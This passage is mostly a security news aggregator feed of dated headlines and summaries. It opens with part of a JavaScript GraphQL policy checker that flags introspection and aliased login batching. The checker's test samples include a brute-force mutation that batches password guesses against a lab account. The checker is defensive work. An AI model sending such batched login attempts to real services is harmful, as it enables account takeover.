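    if (parenDepth > 0 || !/^[_A-Za-z]/.test(t) || KEYWORDS.has(t)) continue;
    const prev = tokens[i - 1];
    // Skip operation names, fragment names, type conditions, spreads, directives.
    if (KEYWORDS.has(prev) || prev === "..." || prev === "@") continue;
    let field = t;
    if (tokens[i + 1] === ":") {   // alias: NAME ':' NAME
      field = tokens[i + 2];
      aliased++;
      i += 2;
    }
    fields[field] = (fields[field] || 0) + 1;
    if (INTROSPECTION_FIELDS.has(field)) introspection = true;
  }
  return { fields, aliased, introspection };
}

// Apply the policy; the per-field counts can also be fed to a token-bucket
// limiter so that one request carrying ten logins costs ten tokens.
function checkDocument(doc, policy = POLICY) {
  const a = analyzeDocument(doc);
  const reasons = [];
  if (a.introspection) reasons.push("introspection field selected");
  if (a.aliased > policy.maxAliases) {
    reasons.push(`${a.aliased} aliased selections exceed limit ${policy.maxAliases}`);
  }
  for (const [name, max] of Object.entries(policy.maxPerField)) {
    const n = a.fields[name] || 0;
    if (n > max) reasons.push(`${name} selected ${n} times, limit ${max}`);
  }
  return { allowed: reasons.length === 0, reasons, ...a };
}

// Constructed samples in the shape of the lab requests.
const SAMPLE_NEWLINE_INTROSPECTION = "query{__schema\n{queryType{name}}}";
const SAMPLE_SINGLE_LOGIN =
  "mutation login($input: LoginInput!) { login(input: $input) { token success } }";
const SAMPLE_BATCHED_LOGIN = `mutation {
  bruteforce0:login(input:{password: "123456", username: "carlos"}) { token success }
  bruteforce1:login(input:{password: "password", username: "carlos"}) { token success }
  bruteforce2:login(input:{password: "12345678", username: "carlos"}) { token success }
}`;

for (const doc of [SAMPLE_NEWLINE_INTROSPECTION, SAMPLE_SINGLE_LOGIN, SAMPLE_BATCHED_LOGIN]) {
  const r = checkDocument(doc);
  console.log(r.allowed ? "allowed" : `rejected: ${r.reasons.join("; ")}`);
}
```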
by HACKLIDO
2025-03-19 06:17:00
Digital trust at scale: the strategic role of CLM in global enterprises
Digital trust is the foundation of secure online interactions, ensuring confidence in transactions, communications, and data protection. For global enterprises, maintaining trust is increasingly challenging due to evolving cybersecurity threats and regulatory complexities. Automated Certificate Lifecycle Management (CLM) enhances security by streamlining SSL/TLS certificate issuance, renewal, and management across distributed environments. CLM strengthens encryption, authentication, and compliance, reducing downtime and mitigating security risks. Learn how automated CLM solutions help global enterprises maintain digital trust at scale.
by Sectigo
2025-03-19 06:01:41
DCCOM and SAFC4DC: A Strategic Move to Secure Singapore’s Digital Backbone
Singapore’s armed forces officially launched two new commands on March 18, 2025, to safeguard the country’s critical digital infrastructure. The Defence Cyber Command (DCCOM) and the SAF C4 and Digitalisation Command (SAFC4DC) will operate under the Digital and Intelligence Service (DIS), Singapore’s fourth military service. Speaking at the inauguration ceremony of DCCOM and SAFC4DC at Hillview Camp, Singapore’s Defence Minister Dr. Ng Eng Hen stressed the importance of the new commands in countering the rising frequency and complexity of cyber threats. He noted that digital vulnerabilities are growing exponentially, making it imperative for the Singapore Armed Forces (SAF) to step up its cyber defenses. “The SAF must rise to the challenge of protecting our digital backbone and critical IT infrastructures,” Dr. Ng stated. “We have seen an alarming increase in cyber threats—threat actors now employ advanced techniques, including artificial intelligence, zero-day exploits, and ransomware, targeting vital sectors like healthcare, energy, and government services.”

DCCOM and SAFC4DC: Boosting Cyber Defense and Digital Innovation
Establishing DCCOM and SAFC4DC is a proactive measure to fortify Singapore’s digital defenses. The Defence Cyber Command will focus on defending the country’s critical military networks, ensuring cybersecurity resilience in the face of evolving cyber threats. Meanwhile, the SAFC4DC will drive the SAF’s digital transformation efforts by leveraging innovative technologies, including cloud computing, 5G, and AI-driven solutions. Dr. Ng emphasized the need for SAF to integrate these digital technologies effectively. “The DIS’ role is to guide the SAF in applying the right tools for the right task. We must harness digital advancements to enhance operational efficiency and security,” he said.
Collaboration with the Public and Private Sectors
Beyond military applications, the newly launched commands will collaborate closely with other government agencies and the private sector. Dr. Ng highlighted the importance of industry partnerships in keeping pace with the growing IT landscape. “The IT cycle moves rapidly, and we must gain access to cutting-edge solutions and operational insights,” he remarked. “Partnering with the private sector will enable the SAF to stay ahead of cybersecurity threats and enhance digital resilience nationwide.” Singapore’s cyber defense strategy also involves tapping into the expertise of Operationally Ready National Servicemen (NSmen). Dr. Ng encouraged NSmen to contribute their knowledge and skills through advisory and technical roles within the DIS. “As cyber threats grow, more NSmen are stepping forward to build our digital defense. Their expertise is invaluable in safeguarding our national security,” he said.

Recognition of Personnel and Future Commitments
During the inauguration, Dr. Ng commended the personnel of DCCOM and SAFC4DC, acknowledging their crucial role in Singapore’s cyber defense strategy. He urged them to uphold their responsibilities with professionalism and dedication. “Today’s inauguration of the SAFC4DC and DCCOM is a positive and important step for the DIS and SAF,” he said. “Singaporeans have placed a heavy responsibility on you—fulfill your mission with unwavering commitment.” To mark the occasion, Dr. Ng unveiled the official logos of both commands and engaged with personnel to discuss their roles in strengthening Singapore’s cybersecurity capabilities.

A Strategic Step Towards Cyber Resilience
The latest findings from the Cyber Security Agency of Singapore (CSA) highlight a concerning reality—many organizations still underestimate the severity of cyber threats.
A staggering 59% of businesses and 56% of non-profits cite a lack of cybersecurity knowledge and experience as their biggest barrier to adopting proper defenses. This knowledge gap is a glaring issue, especially when cybercriminals are constantly refining their attack strategies with AI-powered exploits, zero-day vulnerabilities, and ransomware. The second most common reason for inaction is the mistaken belief that "it won’t happen to us"—a mindset held by 46% of businesses and 49% of non-profits. This overconfidence is dangerous, as recent cyberattacks on healthcare, financial institutions, and government agencies have proven that no sector is immune. Other major roadblocks include limited manpower and resources (39% for businesses, 37% for non-profits), low return on investment (36% for businesses, 31% for non-profits), and budget constraints (31% for businesses, 27% for non-profits). These statistics paint a clear picture: while cybersecurity awareness is growing, tangible action is still lagging behind. As David Koh, Chief Executive of CSA, rightly pointed out, waiting for an attack to happen before investing in cybersecurity is a costly and risky gamble. The economic potential of the cybersecurity industry tells another story—one of immense growth and opportunity. By 2029, the cybersecurity market in Singapore is projected to reach a staggering US$773.23 million, growing at a CAGR of 7.72%. In 2025 alone, companies are expected to spend an average of US$154.21 per employee on cybersecurity measures. With the United States forecasted to lead the global cybersecurity market with revenues reaching US$88.2 billion, Singapore is emerging as a key player, attracting top-tier talent and investments in cutting-edge cybersecurity innovations. Against this backdrop, the launch of DCCOM and the SAF C4 & Digitalisation Command (SAFC4DC) is a game-changer for Singapore’s national defense.
These new commands signify more than just an administrative restructuring—they represent a proactive and strategic approach to securing the nation’s digital infrastructure. The Singapore Armed Forces (SAF) is no longer just defending land, air, and sea; cyber is now a battlefield of its own. With cyberattacks becoming more refined, frequent, and destructive, Singapore’s decision to integrate AI-driven threat detection, cloud computing, and 5G technologies into its defense strategy is both timely and necessary. More importantly, the emphasis on public-private partnerships and leveraging Operationally Ready National Servicemen (NSmen) for cybersecurity expertise is a smart move. Given the rapid pace of technological change, working closely with industry leaders ensures that Singapore’s cyber defenses remain agile, resilient, and ahead of emerging threats. This move sets an important precedent: cybersecurity is no longer optional—it is a national priority. The creation of DCCOM and SAFC4DC is a clear message that Singapore is not waiting to be attacked; it is preparing to deter, defend, and dominate in cyberspace. This shift in mindset is what will separate nations that react to cyber threats from those that proactively neutralize them. By combining technological innovation, strong policy direction, and cross-sector collaboration, Singapore is taking a decisive and forward-thinking stance on cyber resilience. The establishment of these commands is not just about military preparedness—it is about safeguarding the nation’s digital future.
by The Cyber Express
2025-03-19 06:01:00
Humans of HTB #11: Dimitris’s journey into product marketing
Dimitris joined HTB as a Business Development Representative. His passion for B2B offerings and collaboration with product marketing led to his current role as a Product Marketing Specialist
by Hack The Box Blog
2025-03-19 01:45:00
Automating DevSecOps with Sysdig and PagerDuty
Effectively responding to cloud security incidents can be daunting for organizations expanding rapidly in the cloud. Whether you face a...
by Sysdig
2025-03-19 00:00:00
Follow the Adversary: The Top 3 Red Team Exploitation Paths from 2024
by CrowdStrike
2025-03-19 00:00:00
[local] VeeVPN 1.6.1 - Unquoted Service Path
by Exploit DB
2025-03-19 00:00:00
[webapps] Gitea 1.24.0 - HTML Injection
by Exploit DB
2025-03-19 00:00:00
[webapps] TranzAxis 3.2.41.10.26 - Stored Cross-Site Scripting (XSS) (Authenticated)
by Exploit DB
2025-03-19 00:00:00
[webapps] Extensive VC Addons for WPBakery page builder 1.9.0 - Remote Code Execution (RCE)
by Exploit DB
2025-03-19 00:00:00
[webapps] Loaded Commerce 6.6 - Client-Side Template Injection (CSTI)
by Exploit DB
2025-03-18 22:46:00
Uncovering Hidden Threats: Hunting Non-Human Identities in GitHub
In the last few days, two compromised GitHub Actions are actively leaking credentials, and a large-scale OAuth phishing campaign is exploiting developer trust.
by Mitiga
2025-03-18 21:43:21
AMOS and Lumma stealers actively spread to Reddit users
Reddit users from trading and crypto subreddits are being lured into installing malware disguised as premium cracked software.
by Malwarebytes Labs
2025-03-18 21:13:00
New ‘Rules File Backdoor’ Attack Lets Hackers Inject Malicious Code via AI Code Editors
Cybersecurity researchers have disclosed details of a new supply chain attack vector dubbed Rules File Backdoor that affects artificial intelligence (AI)-powered code editors like GitHub Copilot and Cursor, causing them to inject malicious code. "This technique enables hackers to silently compromise AI-generated code by injecting hidden malicious instructions into seemingly innocent
by The Hacker News
2025-03-18 20:58:01
Wireless Airspace Defense Firm Bastille Reveals Top Threats of 2025
by Dark Reading
2025-03-18 20:54:49
Automox Demonstrates IT and Security Impact With Launch of Precision Analytics
by Dark Reading
2025-03-18 20:47:27
Fujifilm Signs Strategic Collaboration Agreement With Amazon Web Services
by Dark Reading
2025-03-18 20:42:43
Duke University & GCF Partner to Identify Pathways for Advancing Women's Careers in Cybersecurity
by Dark Reading
2025-03-18 20:16:44
Google to Acquire Wiz for $32B in Multicloud Security Play
The all-cash deal offers a path for Google to better support cloud customers who have assets spread across public environments, including Azure and others.
by Dark Reading
2025-03-18 19:39:00
Unpatched Windows Zero-Day Flaw Exploited by 11 State-Sponsored Threat Groups Since 2017
An unpatched security flaw impacting Microsoft Windows has been exploited by 11 state-sponsored groups from China, Iran, North Korea, and Russia as part of data theft, espionage, and financially motivated campaigns that date back to 2017. The zero-day vulnerability, tracked by Trend Micro's Zero Day Initiative (ZDI) as ZDI-CAN-25373, refers to an issue that allows bad actors to execute hidden
by The Hacker News
2025-03-18 19:30:00
Google Acquires Wiz for $32 Billion in Its Biggest Deal Ever to Boost Cloud Security
Google is making the biggest ever acquisition in its history by purchasing cloud security company Wiz in an all-cash deal worth $32 billion. "This acquisition represents an investment by Google Cloud to accelerate two large and growing trends in the AI era: improved cloud security and the ability to use multiple clouds (multicloud)," the tech giant said today. It added the acquisition, which is
by The Hacker News
2025-03-18 19:29:44
Microsoft Sounds Warning on Multifunctional 'StilachiRAT'
The sneaky malware packs capabilities for system reconnaissance as well as credential and cryptocurrency theft.
by Dark Reading
2025-03-18 19:14:48
Here’s why Google pitched its $32B Wiz acquisition as ‘multicloud’
Tuesday’s big news that Google is acquiring security startup Wiz for a record-breaking $32 billion comes with a very big qualifier. Google says it will position Wiz as a “multicloud” offering, meaning Wiz will not be a Google-only shop. The reality is that Google had no choice but to do this, and a closer look […]
by TechCrunch
2025-03-18 19:13:00
How a researcher with no malware-coding skills tricked AI into creating Chrome infostealers
Anyone can become a zero-knowledge threat actor now, thanks to AI.
by ZDNET Security
2025-03-18 19:01:00
New Critical AMI BMC Vulnerability Enables Remote Server Takeover and Bricking
A critical security vulnerability has been disclosed in AMI's MegaRAC Baseboard Management Controller (BMC) software that could allow an attacker to bypass authentication and carry out post-exploitation actions. The vulnerability, tracked as CVE-2024-54085, carries a CVSS v4 score of 10.0, indicating maximum severity. "A local or remote attacker can exploit the vulnerability by accessing the
by The Hacker News
2025-03-18 18:45:00
How to Improve Okta Security in Four Steps
While Okta provides robust native security features, configuration drift, identity sprawl, and misconfigurations can provide opportunities for attackers to find their way in. This article covers four key ways to proactively secure Okta as part of your identity security efforts. Okta serves as the cornerstone of identity governance and security for organizations worldwide. However, this
by The Hacker News
2025-03-18 18:43:00
How AI agents help hackers steal your confidential data - and what to do about it
Cybercriminals are using automated AI bots to generate multiple login attempts across a range of services. And it's about to get much worse.
by ZDNET Security
2025-03-18 18:41:00
New Ad Fraud Campaign Exploits 331 Apps with 60M+ Downloads for Phishing and Intrusive Ads
Cybersecurity researchers have warned about a large-scale ad fraud campaign that has leveraged hundreds of malicious apps published on the Google Play Store to serve full-screen ads and conduct phishing attacks. "The apps display out-of-context ads and even try to persuade victims to give away credentials and credit card information in phishing attacks," Bitdefender said in a report shared with
by The Hacker News
2025-03-18 18:05:23
Black Basta Leader in League With Russian Officials, Chat Logs Show
Though the chat logs were leaked a month ago, analysts are now seeing that Russian officials may have assisted Black Basta members, according to the shared messages.
by Dark Reading
2025-03-18 17:42:19
Extortion Reboot: Ransomware Crew Threatens Leak to Snowden
Though the group initially stuck to classic ransomware TTPs before demanding the ransom, it went off script when it began threatening the group and detailing potential consequences the victim would face.
by Dark Reading
2025-03-18 17:30:09
CISA urges fired probationary workers to respond after federal judge grants order
The agency plans to keep workers on paid administrative leave despite ongoing concerns about its ability to address cyber threats.
by Cybersecurity Dive
2025-03-18 17:04:38
ClearFake Malicious Framework Updates Tactics with Binance Smart Chain Obfuscation
Context. Sekoia researchers have released updates on ClearFake, a malicious JavaScript framework that infects compromised websites to deliver malware through drive-by downloads and social engineering tactics. Initially observed in July 2023, ClearFake utilized fake browser update prompts to trick users into downloading malware. The latest 2025 variant introduces new lures, including fake reCAPTCHA and Cloudflare Turnstile verifications,...
by RH-ISAC
2025-03-18 16:54:15
Does IPVanish Work with Netflix in 2025?
IPVanish is a popular VPN service renowned for protecting online privacy, internet security, and reclaiming online freedom. This VPN offers unmatched high speeds, impeccable security, […]
by Privacy Affairs
2025-03-18 16:53:48
NordVPN vs. ProtonVPN: What to Pick in 2025?
NordVPN and ProtonVPN are both security and privacy-oriented VPN providers. They have a similar mission of making the internet better, free of surveillance, censorship, and threats. They also boast a proven track record of fighting internet injustices and helping their users reclaim their online freedom. In this review, we will make an in-depth comparison between NordVPN and ProtonVPN.
by Privacy Affairs
2025-03-18 16:53:03
How to Watch Disney Plus Hotstar in the USA in 2025?
Hotstar is synonymous with the best Indian entertainment, including cricket, and is widely available in India as Disney+ Hotstar. If you live abroad and wish to catch up with Indian content, you can get a limited selection via the international version of Hotstar. This version is available in the US, UK, and Canada.
by Privacy Affairs
2025-03-18 16:52:31
How to Get a Free Trial for CyberGhost VPN in 2025?
CyberGhost is a fast, secure, and reliable VPN service suitable for various online tasks such as torrenting, streaming, and private browsing. CyberGhost allows anyone to […]
by Privacy Affairs
2025-03-18 16:51:22
Best VPN for Saudi Arabia: Top Picks in 2025
Saudi Arabia has one of the worst internet injustices since it has tight control of internet freedom. Despite good internet access, the government practices digital authoritarianism.
by Privacy Affairs
2025-03-18 16:50:26
Best VPN for Android 2025: Top Picks & Latest Reviews
In this guide, you will learn about the best VPNs for your Android smartphone, why you need a VPN on your Android, and you will also know the criteria we use to select the VPNs.
by Privacy Affairs
2025-03-18 16:49:39
How to Watch Spanish La Liga in the USA in 2025?
In this guide, I will explain why you need a VPN to watch La Liga, show you premium and free options for streaming La Liga […]
by Privacy Affairs
2025-03-18 16:49:13
Best VPN for Torrenting in 2025: Rankings and Reviews
Torrenting is among the best ways to get content from Peer-to-Peer (P2P) services. Unlike other methods such as direct downloads, torrenting allows you to get content that’s not hosted in centralized servers.
by Privacy Affairs
2025-03-18 16:48:45
Best VPN for Mac in 2025: Detailed Reviews and Ratings
A VPN increases the privacy of your online information as well as your digital security. It also enables you to access geo-blocked content, avoid digital tracking and use public WIFI more securely.
by Privacy Affairs
2025-03-18 16:48:17
Best VPN for Windows & PC in 2025
Windows is the most popular operating system for personal computers, commonly used for browsing the web, working from home, streaming online content, torrenting, and downloading […]
by Privacy Affairs
2025-03-18 16:48:05
Java 24 Delivers Quantum Resistance, AI Enhancements, Easier Learning
The open source Java 24 programming language adds more features to help developers with AI and security.
by ITPro Today
2025-03-18 15:57:20
CISA scrambles to contact fired employees after court rules layoffs ‘unlawful’
Federal court rules U.S. cybersecurity agency must re-hire over 100 former employees
by TechCrunch
2025-03-18 15:54:00
China-Linked MirrorFace Deploys ANEL and AsyncRAT in New Cyber Espionage Operation
Threat hunters have shed more light on a previously disclosed malware campaign undertaken by the China-aligned MirrorFace threat actor that targeted a diplomatic organization in the European Union with a backdoor known as ANEL. The attack, detected by ESET in late August 2024, singled out a Central European diplomatic institute with lures related to Word Expo, which is scheduled to kick off in
by The Hacker News
2025-03-18 15:31:00
BADBOX 2.0 Botnet Infects 1 Million Android Devices for Ad Fraud and Proxy Abuse
At least four different threat actors have been identified as involved in an updated version of a massive ad fraud and residential proxy scheme called BADBOX, painting a picture of an interconnected cybercrime ecosystem. This includes SalesTracker Group, MoYu Group, Lemon Group, and LongTV, according to new findings from the HUMAN Satori Threat Intelligence and Research team, published in
by The Hacker News
2025-03-18 15:28:52
Actively Exploited ChatGPT Bug Puts Organizations at Risk
A server-side request forgery vulnerability in OpenAI's chatbot infrastructure can allow attackers to direct users to malicious URLs, leading to a range of threat activity.
by Dark Reading
2025-03-18 15:27:06
Orion Security Startup Tackles Insider Threats With AI
The data loss prevention company emerges from stealth with an AI-powered platform to help organizations distinguish between legitimate and risky activity.
by Dark Reading
2025-03-18 15:11:00
How to guard against a vicious Medusa ransomware attack - before it's too late
By following these seven tips from federal authorities, you can prevent Medusa from wreaking havoc on your life and business.
by ZDNET Security
2025-03-18 14:55:43
SAML roulette: the hacker always wins
In this post, we’ll show precisely how to chain round-trip attacks and namespace confusion to achieve unauthenticated admin access on GitLab Enterprise by exploiting the ruby-saml library.
by PortSwigger Research
2025-03-18 14:40:05
Tech Show London: Making Dating Scams Less Attractive
Technology has transformed so many areas of our lives and relatively quickly in the grand scheme of things. From tech used to make education more accessible, for example, to the ever talked about artificial intelligence (AI) shaping many sectors, the way tech has integrated with the modern world both seamlessly and speedily is notable. One […]
by IT Security Guru
2025-03-18 14:27:16
Agentic AI: Why Cyber Defenders Finally Have the Upper Hand
My two previous recent postings on AI covered “Agentic AI” and how that impacts cybersecurity and the eventual emergence of malicious agentic AI malware.
by KnowBe4
2025-03-18 14:26:41
The Cybersecurity Confidence Gap: Are Your Employees as Secure as They Think?
Our recent research reveals a concerning discrepancy between employees' confidence in their ability to identify social engineering attempts and their actual vulnerability to these attacks.
by KnowBe4
2025-03-18 14:00:00
3 AI-Driven Roles in Cybersecurity
For candidates with a cybersecurity background who want to stay competitive, now is the time to invest in obtaining AI skills.
by Dark Reading
2025-03-18 13:54:32
GitHub Actions tj-actions/changed-files Attack
Get details on this recent supply chain attack and how to prevent similar attacks in the future.
by Legit Security
2025-03-18 13:50:00
Is your Chromecast still throwing errors? This fix will get you streaming again
Google has rolled out an update to resolve the issue, but if you factory reset your device, you need to take an additional step.
by ZDNET Security
2025-03-18 13:31:25
This new tool lets you see how much of your data is exposed online - and it's free
Want to keep your personal info safe? Use this tool from ExpressVPN to see how much of it is out there.
by ZDNET Security
2025-03-18 13:29:04
ReliaQuest Sponsors Valspar Championship Youth Clinic to Raise Awareness of Cybersecurity
ReliaQuest sponsors the PGA TOUR’s Valspar Championship youth golf clinic, in partnership with youth golf program First Tee of Tampa Bay.
by ReliaQuest
2025-03-18 12:30:00
Microsoft Warns of StilachiRAT: A Stealthy RAT Targeting Credentials and Crypto Wallets
Microsoft is calling attention to a novel remote access trojan (RAT) named StilachiRAT that it said employs advanced techniques to sidestep detection and persist within target environments with an ultimate aim to steal sensitive data. The malware contains capabilities to "steal information from the target system, such as credentials stored in the browser, digital wallet information, data stored
by The Hacker News
2025-03-18 11:47:54
Amazon disables privacy option, will send your Echo voice recordings to the cloud
Amazon informed Echo users in the US that the "Do not send voice recordings" feature will stop working on March 28, 2025.
by Malwarebytes Labs
2025-03-18 11:46:49
Confirmed: Google buys Wiz for $32B to beef up in cloud security
Google is making the biggest acquisition in its history. The company’s parent company Alphabet is buying Wiz, the cloud security startup, for $32 billion in an all-cash transaction. The deal has now been confirmed. A source described the transaction as a $33 billion deal previously. That includes the $1 billion that Google is paying out […]
by TechCrunch
2025-03-18 11:35:41
Wellbeing in the Cybersecurity Sector: A Call for Participation
Cybersecurity has a wellbeing problem. One that we, at The IT Security Guru, won’t stop shouting about. We’ve all seen the stats: burnout runs rife throughout cybersecurity, there’s a retention issue, and a sizable skills gap. This, on top of the fact that threats are becoming more frequent in volume and more complex in make-up, […]
by IT Security Guru
2025-03-18 11:19:37
MITRE ATT&CK T1562.004 Impair Defenses: Disable or Modify System Firewall
Disable or Modify System Firewall is a defense evasion technique that adversaries use to manipulate firewall settings to bypass security controls and facilitate malicious activities. Firewalls are critical security components designed to monitor and control network traffic, blocking unauthorized access and preventing malicious communication. By disabling or modifying firewall configurations, attackers can move laterally within a network, exfiltrate data, or establish persistent command-and-control (C2) channels without being detected.
by Picus Security
2025-03-18 10:00:13
5 Chromecast features you're not using enough on your TV (including a smart home buff)
Google's reliable casting device has been around for over a decade, and while it will eventually be phased out, it's still useful for more than just streaming your favorite shows.
by ZDNET Security
2025-03-18 10:00:00
The Power of Open Source: Cloud-Native Is Transforming as AI Takes the Limelight
Open source AI is accelerating cloud-native innovation, providing scalable infrastructure and model development tools, but enterprises face challenges in governance, cost, and complexity.
by ITPro Today
2025-03-18 09:37:44
Supply chain attack via GitHub Action
Immediately update secrets that may have leaked due to the compromise of the changed-files GitHub Action via CVE-2025-30066.
by Kaspersky
2025-03-18 09:30:00
The IT Workforce Crisis: Navigating the Looming Skills Gap, Misguided Expectations
As baby boomers retire, IT teams face a critical knowledge gap; businesses must adapt by investing in mentorship, modern tools, and strategic staffing to ensure long-term success.
by ITPro Today
2025-03-18 09:22:00
TikTok rolls out a new Security Checkup tool. Here's how it works
Are the company's new security features enough to quiet the anti-TikTok voices?
by ZDNET Security